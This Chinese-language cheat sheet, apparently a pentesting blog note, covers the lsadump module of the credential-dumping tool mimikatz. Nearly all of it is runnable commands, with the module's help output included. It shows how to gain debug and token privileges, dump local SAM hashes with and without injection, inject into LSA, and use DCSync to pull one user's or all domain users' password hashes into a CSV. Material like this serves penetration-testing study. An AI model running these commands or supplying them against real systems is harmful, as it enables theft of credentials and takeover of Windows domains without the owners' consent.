概述:mimikatz 项目使用及解析
lsadump
在线帮助手册 Mimikatz 🥝 | The Hacker Tools #手册
命令帮助
获取本地用户 hash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| # 提权
privilege::debug
# 读取sam
lsadump::sam
# 使用注入的方式获取
lsadump::sam /inject
# 查看帮助手册
mimikatz # lsadump::
ERROR mimikatz_doLocal ; "(null)" command of "lsadump" module not found !
Module : lsadump
Full name : LsaDump module
sam - Get the SysKey to decrypt SAM entries (from registry or hives)
secrets - Get the SysKey to decrypt SECRETS entries (from registry or hives)
cache - Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)
lsa - Ask LSA Server to retrieve SAM/AD entries (normal, patch on the fly or inject)
trust - Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly)
backupkeys
rpdata
dcsync - Ask a DC to synchronize an object
dcshadow - They told me I could be anything I wanted, so I became a domain controller
setntlm - Ask a server to set a new password/ntlm for one user
changentlm - Ask a server to set a new password/ntlm for one user
netsync - Ask a DC to send current and previous NTLM hash of DC/SRV/WKS
packages
mbc
zerologon
postzerologon
|
获取域用户
参考文章:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| # 提权
privilege::debug
# 获取token权限
token::elevate
# 执行注入
lsadump::lsa /inject
# 读取sam
lsadump::dcsync /user:username
# 使用注入的方式获取指定用户
lsadump::dcsync /user:username /inject
# 获取域内所有用户
lsadump::dcsync /domain:test.com /all /csv
|